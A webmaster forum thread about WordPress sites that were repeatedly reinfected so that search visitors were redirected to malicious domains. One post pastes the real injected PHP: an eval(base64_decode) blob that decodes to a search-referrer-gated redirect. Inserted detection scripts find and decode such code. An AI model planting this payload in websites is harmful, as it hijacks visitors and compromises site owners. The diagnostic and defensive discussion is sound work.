My Sites Have Been HACKED - Please HELP!!!!!!!!!!

by nik0 Banned
68 replies
All the sites that I host at Justhost have been hacked some time ago. The hosting restored a backup, replaced my root files multiple times, we changed all the passwords and the problem keeps coming back every single time.

Right now when I enter my site URL directly in the address bar of my browser I do end up on my site.

However when I Google my site and click on my sites from the search results I get redirected instead of ending up on my own sites.

From firefox I get redirected to: hxxp://404.wikaba.com/?said=3333g&q=

From Chrome I get redirected to: hxxp://404.wikaba.com/?said=3333g&q=

This time as well, 10 minutes ago I got redirected to another site as well named: http://zserty.lflink.com/main.php?page=588ec4e4ea3b00d8

Can anyone help me how to solve this cause the support has definitely no clue whatsoever this time.
#hacked #recently #sites
  • Profile picture of the author limestone614
    You don't really give a lot away, however in the past most intrusions into our sites have been caused by poorly made Wordpress Plugins or known vulnerabilities.

    Have you looked at the timthumb exploit?

    It can be used to inject code into your site, Base64. They can then alter your htaccess file.
    Nasty stuff.

    It can cause the effect you are seeing.

    Are you using Wordpress, if so, update it, what about any themes? Do any of them use the timthumb feature, if so are they using the new, fixed version?

    Google is your friend, this has happened thousands of times.

    FYI, if you were with Hostgator, they would have likely fixed this issue for you.

    Good Luck.
    Signature
    The Best Organic Traffic Solutions.
    For yours, take the next step: Visit Safeserps
    .
  • Profile picture of the author WinsonYeung
    My website get hacked before too. You need to find someone who is good at IT and disable cpanel/whm login by country IP.

    Agree with "tony" about the hostgator part
    Signature
    [WSO of The Day] Discount How To Generate 172.56% Positive Return OR build your List for FREE!

    "Case Study: Discover You Can Make $1371.66 With A Simple Blog Post by Clicking Here"
  • Profile picture of the author Mike Anthony
    Bleh hate to hear about this because I have clients that just insist on everything being wordpress and doing the updates is quite a pain on sometimes hundreds of sites at a time.
    • Profile picture of the author Michael Carlin
      Originally Posted by Mike Anthony View Post

      Bleh hate to hear about this because I have clients that just insist on everything being wordpress and doing the updates is quite a pain on sometimes hundreds of sites at a time.

      Managewp. I run 500 sites with them, so the $400 per month is well worth it. You can manage 5 sites for free to try it out, there's 3 different pricing points, so you can manage 100 sites for less than $100 on a cheaper package.

      It will sync up plugins (using other blogs to fetch the files to install them on new sites, for example). It lets you know when your webhost is down, does rankings once per week too.

      The only thing that is tricky, is creating plugin settings, you have to write your own php to do it, but it's a lot easier than going through 500 sites manually.
      • Profile picture of the author Mike Anthony
        Originally Posted by Michael Carlin View Post

        Managewp. I run 500 sites with them, so the $400 per month is well worth it. You can manage 5 sites for free to try it out,
        Yeah Have used ManageWP from last year (beta tested it in fact), recommend and even included them in my network training class but since I now am and will be managing many other networks but my own its just not feasible to me. I am having my own system built
  • Profile picture of the author nik0
    Banned
    Thanks someone else also just pointed me at hostgator and how they fix it in a second, but this bloody justhost says "It's not a hosting problem so buzz off", talking with a tech guy now on Skype who is logging in and he found tons of malicious code in my footer and header files. Hope I can fix it soon :S
  • Profile picture of the author limestone614
    It's likely to be the reason I stick with Hostgator, I've had to sit for hours stripping chunks of Base 64 code that have been maliciously injected into my sites.

    Hours and hours of boring tedious sh*t.

    With Hostgator it "Live chat" - Explain the issue, go through security, wait 10 minutes, problem solved.

    They've cleaned 5 shared servers, each with 20 sites on them in 10 minutes.

    Awesome.
    • Profile picture of the author yukon
      Banned
      Originally Posted by limestone614 View Post

      It's likely to be the reason I stick with Hostgator, I've had to sit for hours stripping chunks of Base 64 code that have been maliciously injected into my sites.

      Hours and hours of boring tedious sh*t.

      With Hostgator it "Live chat" - Explain the issue, go through security, wait 10 minutes, problem solved.

      They've cleaned 5 shared servers, each with 20 sites on them in 10 minutes.

      Awesome.
      Yep, base64 code is always a sign of a hacked theme file.

      There's no legit reason for anyone to use base64 code inside a theme or plugin.
      • Profile picture of the author Mike Anthony
        Originally Posted by yukon View Post

        Yep, base64 code is always a sign of a hacked theme file.

        There's no legit reason for anyone to use base64 code inside a theme or plugin.
        Depends on what you mean by legit. base64 is used by some designers that want to make it harder for you to remove their copyright and links. Not always a hacking thing.
        • Profile picture of the author yukon
          Banned
          Originally Posted by Mike Anthony View Post

          Depends on what you mean by legit. base64 is used by some designers that want to make it harder for you to remove their copyright and links. Not always a hacking thing.
          With thousands of WP themes available, no way should anyone need to run a theme that includes base64 code. IMO, it's not even an option to use those themes.

          The base64 can be decoded online (free tools), still, too much work/time wasted trying to figure out what they are hiding in the code.
  • Profile picture of the author yukon
    Banned
    It could be that you downloaded a theme that was hacked (before you ever downloaded the theme).

    A lot of free theme sites hack the themes just for backlinks, or in your case a redirect.
    • Profile picture of the author nik0
      Banned
      Originally Posted by yukon View Post

      It could be that you downloaded a theme that was hacked (before you ever downloaded the theme).

      A lot of free theme sites hack the themes just for backlinks, or in your case a redirect.
      Thing is all 29 sites are hacked on this hosting, can a theme hack cause all the other sites that are on the same shared hosting plan also to get hacked?
      • Profile picture of the author yukon
        Banned
        Originally Posted by nik0 View Post

        Thing is all 29 sites are hacked on this hosting, can a theme hack cause all the other sites that are on the same shared hosting plan also to get hacked?
        I doubt 1 theme/plugin would take down all the sites, base64 (WP theme/plugin hack) is usually contained to the domain the theme is on.

        Did you look at any of the sites htaccess file for redirects? Download the file to your desktop & look at the code.
  • Profile picture of the author nik0
    Banned
    I wish I could use just hostgator but I run a blog network here so I need dozens of shared hosting plans.
    • Profile picture of the author Rian
      Originally Posted by nik0 View Post

      I wish I could use just hostgator but I run a blog network here so I need dozens of shared hosting plans.
      Ouch, it is a huge responsibility you have then in managing your sites...
    • Profile picture of the author limestone614
      Originally Posted by nik0 View Post

      I wish I could use just hostgator but I run a blog network here so I need dozens of shared hosting plans.
      As do I run a blog network, I have 30+ shared hosting plans with hostgator.

      In response to some other questions/points.

      Being exploited on 1 site on a shared hosting package can in fact not only infect all your other sites on that shared server, but also others on the same server that are not yours, depending on how the server is setup.

      Base64 code is used legitimately in some Plugins.

      If you do a search online you will find a small piece of code to save on your server, when run via a browser window it will list all the files on the server containing Base64 code.

      Then you can remove it manually or simply replace the infected files with known good ones.

      Each time I had been exploited via Base64 code it was injected via the timthumb exploit found in older versions of Timthumb.php.

      You should check that also, it is used by a lot of themes.


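A scanner of the kind described in the post above, as an added example that is not code from the thread: it walks a site tree, finds `eval(base64_decode(...))` calls in PHP files, decodes them without executing anything, and separates referrer-gated redirects from other hidden code (such as a theme's footer link). The sample theme files, payloads and `.invalid` hostnames are constructed for the demonstration.

```python
import base64
import binascii
import re
import tempfile
from pathlib import Path

# Matches eval(base64_decode("...")). Whitespace inside the quoted blob is
# allowed because editors and forums often wrap long strings.
WRAPPER = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""",
    re.IGNORECASE,
)
REDIRECT = re.compile(r"""header\s*\(\s*['"]Location:\s*([^'"\s]+)""", re.IGNORECASE)


def decode_blob(blob):
    """Decode the blob as text. The decoded PHP is only read, never executed."""
    compact = re.sub(r"\s+", "", blob)
    compact += "=" * (-len(compact) % 4)  # repair padding lost to truncation
    try:
        return base64.b64decode(compact).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return ""


def classify(decoded):
    """Triage label for one decoded payload, plus any redirect targets found."""
    redirects = REDIRECT.findall(decoded)
    gated = "HTTP_REFERER" in decoded or "HTTP_USER_AGENT" in decoded
    if redirects and gated:
        return "conditional-redirect", redirects
    if redirects:
        return "redirect", redirects
    return "obfuscated-review-manually", redirects


def scan_tree(root):
    """Return one finding per eval(base64_decode(...)) call in *.php under root."""
    findings = []
    for path in sorted(Path(root).rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        for match in WRAPPER.finditer(text):
            verdict, redirects = classify(decode_blob(match.group(2)))
            findings.append({
                "file": path.relative_to(root).as_posix(),
                "line": text.count("\n", 0, match.start()) + 1,
                "verdict": verdict,
                "redirects": redirects,
            })
    return findings


def wrap(blob, width=48):
    """Insert spaces into a blob, as a forum or editor would when wrapping it."""
    return " ".join(blob[i:i + width] for i in range(0, len(blob), width))


def build_sample_site(root):
    """Write a constructed theme: a redirector, a hidden footer link, a clean file."""
    theme = Path(root) / "wp-content" / "themes" / "demo"
    theme.mkdir(parents=True)
    redirector = (
        "error_reporting(0);\n"
        "$r = $_SERVER['HTTP_REFERER'];\n"
        'if (stristr($r, "google") or stristr($r, "bing")) {\n'
        '  header("Location: http://redirect.example.invalid/");\n'
        "  exit();\n"
        "}\n"
    )
    footer_link = "echo '<a href=\"http://theme-author.example.invalid/\">Theme credit</a>';"

    def encode(php):
        return wrap(base64.b64encode(php.encode()).decode())

    (theme / "header.php").write_text(
        '<?php eval(base64_decode("%s")); ?>\n<html>\n' % encode(redirector))
    (theme / "footer.php").write_text(
        '</body>\n</html>\n<?php eval(base64_decode("%s")); ?>\n' % encode(footer_link))
    (theme / "index.php").write_text("<?php get_header(); get_footer(); ?>\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        for finding in scan_tree(tmp):
            print(finding)
```

Files flagged `obfuscated-review-manually` still need a human to read the decoded text; the scanner only recognises the redirect pattern discussed in this thread.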
    • Profile picture of the author Michael Carlin
      Originally Posted by nik0 View Post

      I wish I could use just hostgator but I run a blog network here so I need dozens of shared hosting plans.
      I'm currently using around 90 hosting account, but only 2 with HG.

      I've been looking at another option, where I can buy 100 dedicated IPs for $130, all unique C class, many B and A class too.

      I can have this running on one dedicated server. The whole thing will cost me $350 (it's nice to have friends in the industry ) per month, for easy management of 100 network domains, or 200 if I want to double up the Ips but keep those 2 networks separate.

      So, I'm gonna give it ago, and maybe not always rely on a hundred hosting accounts.
      • Profile picture of the author limestone614
        Originally Posted by Michael Carlin View Post

        I'm currently using around 90 hosting account, but only 2 with HG.

        So, I'm gonna give it ago, and maybe not always rely on a hundred hosting accounts.
        It sounds like a great idea, we use xMarkpro, which is a blog management interface, it need not be Wordpress, any type of site.

        Likewise it monitors plugins, themes and SERPS, plus more.
        Content, spinning, built in thesaurus, connection to various api's, the best spinner etc.

        Link tracking and mass alteration of links, banner adverts etc.

        It's a great system, but sure enough the hosting charges mount up.
  • Profile picture of the author yukon
    Banned
    OP, did you use the same theme/plugins on all 29 sites?
    • Profile picture of the author nik0
      Banned
      Originally Posted by yukon View Post

      OP, did you use the same theme/plugins on all 29 sites?
      No I use different themes on all the sites, I only use 1 common link juice keeper plugin, but I also use that on my other hostings and never a problem with any of my sites so that can't be it I guess.

      Also there was nothing wrong with my .htaccess file.

      Only thing I worry about now if the same thing will happen next week again. Already struggling with this stuff for 3 weeks now.

      - 1st week, I got some weird blank screen with just a few letters like KGH-SGS or something
      Solution: Hosting restored my root files from the WP installations

      - 2nd week, my complete FTP host was empty, ALL files were deleted
      Solution: Hosting restored a backup

      - 3rd week, all my sites redirect to malicious sites (right now while I made this post)
      Solution: Again changed passwords, removed mysql remote thing, restored a backup again

      But as said, I wonder how long it will last this time :S
  • Profile picture of the author NetBizOnline
    ohh sorry to hear that.why they do that?
  • Profile picture of the author nik0
    Banned
    Problem is solved now, I restored the old backup, but well the hoster did that some time ago as well and then later it was hacked again. I also deleted some remote Mysql user in my Cpanel and changed my hosting and ftp password (although I already did that 1 week ago). Let's see....
  • Profile picture of the author Mike Anthony
    Nik if you are using plugins on your network sites you can safely take them off. No need for any plugins on network sites.
    • Profile picture of the author nik0
      Banned
      Originally Posted by Mike Anthony View Post

      Nik if you are using plugins on your network sites you can safely take them off. No need for any plugins on network sites.
      Thing is I do need this linkjuice keeper plugin, but I don't think the risk is in that as all my other 200+ sites are fine.

      Also I use some different rating plugins, for my review sites so that it also looks like a review site, with stars and all. But those sites aren't affected either, they are on different hostings.

      Or it has to do with a previous employee that installed sites for me, or it has to do with some malicious theme that I downloaded somewhere that affected all my other sites as well on that hosting plan. I used to get nice niched themes for my guest post sites from all kind of sources so good chance I picked something up that way.
  • Profile picture of the author palms
    This is what often happens...

    1.) A trojan gets in your LOCAL machine.

    2.) This trojan scraps your FTP client for login userID/password info and sends it to the mothership.

    3.) The mothership uses the scraped login info to upload a base64-encoded javascript iframe to certain pages of all your sites that are listed in your FTP client, usually the index.php page.

    The reason this virus is so insidious is that webmasters try to attack the problem by either removing the javascript or restoring a back-up, but this will only fix the problem temporarily because the sites keep getting re-infected. Remember, the mothership has your FTP login info.

    The REAL problem is on the LOCAL machine. Clean the LOCAL machine first, then change all passwords to your sites.

    THEN remove the iframe javascript from the WP sites.
    • Profile picture of the author nik0
      Banned
      Originally Posted by palms View Post

      This is what often happens...

      1.) A trojan gets in your LOCAL machine.

      2.) This trojan scraps your FTP client for login userID/password info and sends it to the mothership.

      3.) The mothership uses the scraped login info to upload a base64-encoded javascript iframe to certain pages of all your sites that are listed in your FTP client, usually the index.php page.

      The reason this virus is so insidious is that webmasters try to attack the problem by either removing the javascript or restoring a back-up, but this will only fix the problem temporarily because the sites keep getting re-infected. Remember, the mothership has your FTP login info.

      The REAL problem is on the LOCAL machine. Clean the LOCAL machine first, then change all passwords to your WP sites.

      THEN remove the iframe javascript from the WP sites.
      You would think they would've hacked my paypal and other accounts as well, yeah up until recently I was so stupid to save that data on my pc. Also it amazes me that my other hostings are all clear. Anyway definitely worth it to run another virus check and change everything once again. Just in case. Thanks!
      • Profile picture of the author nik0
        Banned
        Not sure if it's useful to anyone but this is what we found in the header/ footer and more files:

        <?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQ okcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxt KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXT sNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0K aWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFID cuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsK aWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaX N0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVy ZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2 dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9y IHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0ci gkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVy LCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW 4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBv bi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKS BvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9y IHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD 8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2 dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibX lzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNl Ym9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY2 9tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUi KSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZW FkZXIoIkxvY2F0aW9uOiBodHRwOi8vcGtqbGFwb2suMWR1bWIu Y29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0="));

        I've seen this kind of code in PAID themes as well btw, to protect them from removing the footer links. Oh yeah Mike just said that as well. The site where we got this code from wasn't a paid theme site.
        • Profile picture of the author yukon
          Banned
          Originally Posted by nik0 View Post

          Not sure if it's useful to anyone but this is what we found in the header/ footer and more files:


          I've seen this kind of code in PAID themes as well btw, to protect them from removing the footer links. Oh yeah Mike just said that as well. The site where we got this code from wasn't a paid theme site.





          Well, there's your answer.

          I had to post an image of the source code because the forum wouldn't allow the code to posted. Here is where you can decode any other base64 code you have.
          hxxp://www.base64decode.org/
          Chances are they've rigged the theme to not work If the base64 code is removed.

          Like I said before, get rid of anything that includes base64, find another theme/plugin, whatever...

          Here is the base64 code decoded.




          • Profile picture of the author Mike Anthony
            Originally Posted by nik0 View Post

            Thing is I do need this linkjuice keeper plugin, but I don't think the risk is in that as all my other 200+ sites are fine.
            Do you get this off site because the one I saw on wordpress's site with that name has not been updated in two years.


            Originally Posted by yukon View Post

            With thousands of WP themes available, no way should anyone need to run a theme that includes base64 code. IMO, it's not even an option to use those themes..
            Wasn't speaking to whether you should use them but to the fact that not everyone that puts those in does it for hacking reasons. It can be overcome of course but some designers put them in - also a very wide practice on sponsored themes neither of which are trying to do any hacking.
            • Profile picture of the author yukon
              Banned
              Originally Posted by Mike Anthony View Post

              Wasn't speaking to whether you should use them but to the fact that not everyone that puts those in does it for hacking reasons. It can be overcome of course but some designers put them in - also a very wide practice on sponsored themes neither of which are trying to do any hacking.
              I see what you're saying, but I have a yes/no rule for anything free or paid:

              Does it include base64 code?
              • Yes, dump it.
              • No, keep it.

              I don't have enough time to play games with themes/plugins, If the author is that insecure that they have to hide code, they can keep the theme/plugin, I don't need it.

              Also, If base64 code was in a paid theme, I would demand a refund & move on to the next seller without base64 code.
              • Profile picture of the author Mike Anthony
                Agree with you on all counts even more on paid themes.


                Originally Posted by yukon View Post

                I see what you're saying, but I have a yes/no rule for anything free or paid:

                Does it include base64 code?
                • Yes, dump it.
                • No, keep it.

                I don't have enough time to play games with themes/plugins, If the author is that insecure that they have to hide code, they can keep the theme/plugin, I don't need it.

                Also, If base64 code was in a paid theme, I would demand a refund & move on to the next seller.
            • Profile picture of the author nik0
              Banned
              Originally Posted by Mike Anthony View Post

              Do you get this off site because the one I saw on wordpress's site with that name has not been updated in two years.
              Not sure where I got it from but it's not that complicated what it does so I don't think it requires any updates, at least hope so.
  • Profile picture of the author palms
    It happened to me when I bought a new PC and was setting it up. I forgot to set Norton to scan incoming emails for about the first 10 minutes I had my computer running and bang, I got hit. I didn't know it until Google started throwing up red virus warning screens on all my sites.

    Hostgator knew exactly what the problem was and fixed it within 15 minutes of my call. They also sent me a detailed email of exactly what they found, what was removed, and most importantly HOW the whole thing happened. Hostgator is a great host.

    Good luck with your sites.
  • Profile picture of the author BAC
    Your website's main page (index page) is hacked you need to upload and overwrite it from your backup.

    Thanks,
    VGM
    Signature

    Get Content Targeted Super Real Traffic to Boost your Adsense Revenue!

  • Profile picture of the author nik0
    Banned
    Right now I'm installing a plugin on all my sites that checks for the timthumb indeed.

    Also a virus scanner plugin that finds many dangerous codes in the themes, actually I think this virus plugin indicates too much as dangerous but well better safe than sorry, I try to only use themes that have zero errors cause what can be innocent today might be something that they exploit tomorrow.

    I also have a WP firewall plugin but that might get a bit nasty as we have to fill in our IP address there but my VA's need access to the sites and with dynamic IP's it gets too hard.

    Thanks for all the suggestions, plenty of work to do now pffff
  • Profile picture of the author HostWind
    nik0, it looked like the insert checked for a few old browsers and certain referers, if found it would redirect the user.

    Glad to hear its all fixed up!
  • Profile picture of the author nik0
    Banned
    Thanks Hostwind.

    I'm a bit old fashioned with my network, right now 250 sites and counting and we do all manually. It's not that big of a deal though as we setup each site differently and customize it a bit, it's hard to do that with tools. For the rest we only post unique content on each of them so my VA's just have to login a bit more often then normal, find a nice related picture for the blog post. Right now I do miss a management console but well it's a one time thing I guess. Let's hope this doesn't happen again.
    • Profile picture of the author WinsonYeung
      Originally Posted by nik0 View Post

      Thanks Hostwind.

      I'm a bit old fashioned with my network, right now 250 sites and counting and we do all manually. It's not that big of a deal though as we setup each site differently and customize it a bit, it's hard to do that with tools. For the rest we only post unique content on each of them so my VA's just have to login a bit more often then normal, find a nice related picture for the blog post. Right now I do miss a management console but well it's a one time thing I guess. Let's hope this doesn't happen again.
      You mention about VA. Tell your VA to scan their PC too!
      • Profile picture of the author nik0
        Banned
        Originally Posted by WinsonYeung View Post

        You mention about VA. Tell your VA to scan their PC too!
        Just did yeah
  • Profile picture of the author Dentist
    We had the exact same problem with one of our authority websites. It drove me crazy. I don't remember the name of the malware but fixing it involved manually removing it from each page and it had copied itself everywhere (over 1000 instances). The same effect (clicking on the search result redirected us to another page). Anyhow, we ended up the paid version of sucuri and they fixed it pretty fast. No affiliation with Sucuri (and they have their own problems too) but I do recommend them because we lost so much leads for a while before they fixed it....
    • Profile picture of the author nik0
      Banned
      Originally Posted by Dentist View Post

      We had the exact same problem with one of our authority websites. It drove me crazy. I don't remember the name of the malware but fixing it involved manually removing it from each page and it had copied itself everywhere (over 1000 instances). The same effect (clicking on the search result redirected us to another page). Anyhow, we ended up the paid version of sucuri and they fixed it pretty fast. No affiliation with Sucuri (and they have their own problems too) but I do recommend them because we lost so much leads for a while before they fixed it....
      I'll definitely look into Sucuri or any paid thing of that kind. It can get pretty expensive and it's not that you Google your own site on daily base to find out that it's hacked. Definitely something that people should do once in a while.
      • Profile picture of the author Dentist
        Originally Posted by nik0 View Post

        I'll definitely look into Sucuri or any paid thing of that kind. It can get pretty expensive and it's not that you Google your own site on daily base to find out that it's hacked. Definitely something that people should do once in a while.
        The website I am referring to was generating S40K/month worth of traffic from SEO (according to SEMRush compared to if we purchased the traffic from PPC) at the time. We got the annual removal package for one website (I think it was $89 annually at the time). For us, compared to the time we lost contemplating what to do and the opportunity loss of leads was worth it. Obviously for you it goes back to the opportunity loss of each website. BTW, I think you can ask them to take a look at your website/websites for free (plus their automatic monitoring tool is free) and ask them if they can fix it/them beforehand. That way you are safe if it didn't work out.
  • Profile picture of the author Dentist
    BTW, I forgot to mention. We think we got it from our webhosting. Somehow they have a backdoor. We communicated it to them and they denied it but nevertheless that was our conclusion...
    If you have all of the websites you have on one webhosting got it, there is a high chance there...
  • Profile picture of the author nik0
    Banned
    This is truly absurd.

    Last night I changed all my passwords:

    - Cpanel
    - Disabled FTP access
    - Cleaned up all the sites, new themes, virus scan, timthumb checker

    And today all sites at that hosting are full of base64code again. :S

    EDIT: Hack code removed
  • Profile picture of the author nik0
    Banned
    I just did a website scan at sucuri:


    Security report (No threats found):
    Blacklisted: No
    Malware: No
    Malicious javascript: No
    Malicious iFrames: No
    Drive-By Downloads: No
    Anomaly detection: No
    IE-only attacks: No
    Suspicious redirections: No
    Spam: No

    But my code is fully infected with this base64 code, and they only redirect users when they visit my site from a search engine, not when I type in the URL directly in my browser, so the tool can't find anything for that reason. How sick is that. I will contact them to see if they can help.

    Almost $700 to fix 29 sites, then they clean it up, like I can do also with 1 click to restore all, and the next day it's back :S
  • Profile picture of the author mosthost
    What's your budget to get this fixed? This is a common PHP injection.
    • Profile picture of the author nik0
      Banned
      Originally Posted by mosthost View Post

      What's your budget to get this fixed? This is a common PHP injection.
      I don't want to spend a fortune on it. Actually I'm thinking about downloading all posts manually, save them in a txt file, and then move all the sh*t away from Justhost, what a provider. Just rehost all of my sites, few days work for my VA's and then I'm done for less than $100,-

      You know what chat support said? They say that it's a Google cache problem and that I should contact them, really wtf.

      Can't even restore a normal backup anymore.

      At some sites I get a blank screen and this message:

      BY KSG-CREW


      Plenty of Google results when you type that in :S
      • Profile picture of the author Mike Anthony
        Originally Posted by nik0 View Post

        I don't want to spend a fortune on it. Actually I'm thinking about downloading all posts manually, save them in a txt file, and then move all the sh*t away from Justhost, what a provider. Just rehost all of my sites, few days work for my VA's and then I'm done for less than $100,-

        I'd do that in a heartbeat. Using a good automation tool with scraping features (regex) it would take a few hours including setting up the script. (reposting them should be a snap too).
        • Profile picture of the author nik0
          Banned
          Originally Posted by Mike Anthony View Post

          I'd do that in a heartbeat. Using a good automation tool with scraping features (regex) it would take a few hours including setting up the script. (reposting them should be a snap too).
          I just used the content export function, took me 30 minutes. Now I have to re-install all sites again and make them look beautiful again, won't be done in a few hours
        • Profile picture of the author Michael Carlin
          Originally Posted by Mike Anthony View Post

          I'd do that in a heartbeat. Using a good automation tool with scraping features (regex) it would take a few hours including setting up the script. (reposting them should be a snap too).
          The post content might be easier to extract through the MySQL database. Of course, that can be (and almost certainly is) infected too, but you can extract just the posts/pages content, and not all the WP tables.

          Originally Posted by Oranges View Post

          Yeah! Had a similar issue in past with some low-life host for my blog network sites and XML db export and import worked just fine. My sites were hacked because some other user's account on the same server was compromised and hacker was able to have access to the root of the server. Errrrr...big time nightmare.
          Yeah, that's the problem with this new script that's been sold everywhere.
  • Profile picture of the author nerbie
    If I were the one to handle this issue, I would revert all themes to the WordPress default theme. It doesn't matter if I have to log in to all of them one by one. This will preserve Google ranking since you don't need to take the site down, and prevents Google from recognizing your domain as harmful, especially if there is malware in the WordPress theme. Secondly, I would remove it manually, starting with the most important website down to the least important. In a few hours you can remove that malicious code, then put back your theme. You may also check the .htaccess of each domain to remove the redirection if you see it there.

    By the way, I also host my personal 50+ WordPress domain names scattered across 3 dedicated servers and am able to do this within a few hours. The only difference is that I have direct access to the server boxes, which makes it easier for me.
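An added example, not part of any post in this thread: a redirect that fires only for search-engine referrers is invisible to a remote scan that requests the URL directly, so the check has to run against the files on disk, including the .htaccess files mentioned above. The patterns, reason strings and sample contents below are constructed assumptions, and hits are leads for manual review rather than a verdict.

```python
import os
import re
import sys

# Heuristics for manual review, not malware signatures.
HTACCESS_REFERER = re.compile(
    r"RewriteCond\s+%\{HTTP_REFERER\}.*(google|bing|yahoo|search)", re.I)
PHP_DECODE_EXEC = re.compile(
    r"\b(eval|assert)\s*\(\s*(base64_decode|gzinflate|gzuncompress)\s*\(", re.I)
LONG_BASE64 = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")

def scan_text(name, text):
    """Return (reason, line_number) findings for one file's contents."""
    findings = []
    is_htaccess = os.path.basename(name) == ".htaccess"
    for n, line in enumerate(text.splitlines(), 1):
        if is_htaccess:
            if HTACCESS_REFERER.search(line):
                findings.append(("referrer-conditional rewrite", n))
        elif PHP_DECODE_EXEC.search(line):
            findings.append(("eval of decoded data", n))
        elif LONG_BASE64.search(line):
            findings.append(("long base64-like string", n))
    return findings

def scan_tree(root):
    """Walk a webroot and yield (path, reason, line) for .htaccess and .php files."""
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            if f == ".htaccess" or f.endswith(".php"):
                path = os.path.join(dirpath, f)
                with open(path, errors="replace") as fh:
                    for reason, n in scan_text(path, fh.read()):
                        yield path, reason, n

# Constructed samples; the code posted in the thread was edited out.
SAMPLE_HTACCESS = """RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC]
RewriteRule .* http://redirect.example.invalid/ [R=302,L]
"""
SAMPLE_PHP = "<?php eval(base64_decode('cGxhY2Vob2xkZXI=')); ?>\n<?php echo 'ok'; ?>\n"

if __name__ == "__main__":
    if len(sys.argv) > 1:          # scan a real webroot given on the command line
        for hit in scan_tree(sys.argv[1]):
            print(*hit, sep="\t")
    else:                          # otherwise demonstrate on the samples
        print(scan_text(".htaccess", SAMPLE_HTACCESS))
        print(scan_text("wp-cron.php", SAMPLE_PHP))
```

Run it with the account's web root as the only argument and compare the flagged files against a fresh copy of WordPress and the installed themes before deleting anything.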
    • Profile picture of the author tech84
      Sometimes, the problem lies with the hosting, they may have security vulnerabilities that even though you clean up your codes, on the server side, they would still continue to be hacked.

      How did I jump to this conclusion? From experience, once I was using the services of one super shitty *#&&*% host (I still wonder why their business is still running even though the whole internet knows how bad their services are.....*still not gonna name them lol)

      All the sites (running WordPress) in their whole database got hacked, no apologies, no we'll fix this, no we'll upgrade our servers to prevent this in the future, no we'll improve our security, NO F*****g backups provided (yes that's TRUE, they even blamed us for not having a copy of the most recent backup of our sites).


      Sorry if I seem to be ranting here, just really wanted to say that the problem could be from your hosting.
  • Profile picture of the author nik0
    Banned
    I just think I found the source. My wp-cron.php shows the malicious code as well:


    EDIT: Malicious code removed, we don't want to make hackers any smarter
  • Profile picture of the author Martin Pupke
    Whenever anything of yours is hacked a good step is to return your computer to "factory condition". Make sure you back up your data first.
  • Profile picture of the author Oranges
    It is definitely an issue from Justhost's side. I'd give it a shot by first taking the XML database backup wp-admin>>tools>>export and then delete all the files and MySQL DB and then do a new clean install by using Fantastico or manually and then restore the site by importing XML database that you have exported. That way all your files and MySQL DB will be new and clean. Give it a try, maybe that will work. Good luck
    • Profile picture of the author nik0
      Banned
      Originally Posted by Oranges View Post

      It is definitely an issue from Justhost's side. I'd give it a shot by first taking the XML database backup wp-admin>>tools>>export and then delete all the files and MySQL DB and then do a new clean install by using Fantastico or manually and then restore the site by importing XML database that you have exported. That way all your files and MySQL DB will be new and clean. Give it a try, maybe that will work. Good luck
      Thanks a lot, I was just copy pasting every single post to Notepad LOL
      • Profile picture of the author Oranges
        Originally Posted by nik0 View Post

        Thanks a lot, I was just copy pasting every single post to Notepad LOL
        Yeah! Had a similar issue in past with some low-life host for my blog network sites and XML db export and import worked just fine. My sites were hacked because some other user's account on the same server was compromised and hacker was able to have access to the root of the server. Errrrr...big time nightmare.
        • Profile picture of the author nik0
          Banned
          Originally Posted by Oranges View Post

          Yeah! Had a similar issue in past with some low-life host for my blog network sites and XML db export and import worked just fine. My sites were hacked because some other user's account on the same server was compromised and hacker was able to have access to the root of the server. Errrrr...big time nightmare.
          Pfff nice protection those hosting sites have.

          You think it might be smart to re-addon the domains in the cpanel?
          • Profile picture of the author Oranges
            Originally Posted by nik0 View Post

            Pfff nice protection those hosting sites have.
            You think it might be smart to re-addon the domains in the cpanel?
            Avoid that if you can, because if that happened because some other user's account got compromised then there is nothing you can do about it and it will keep coming.

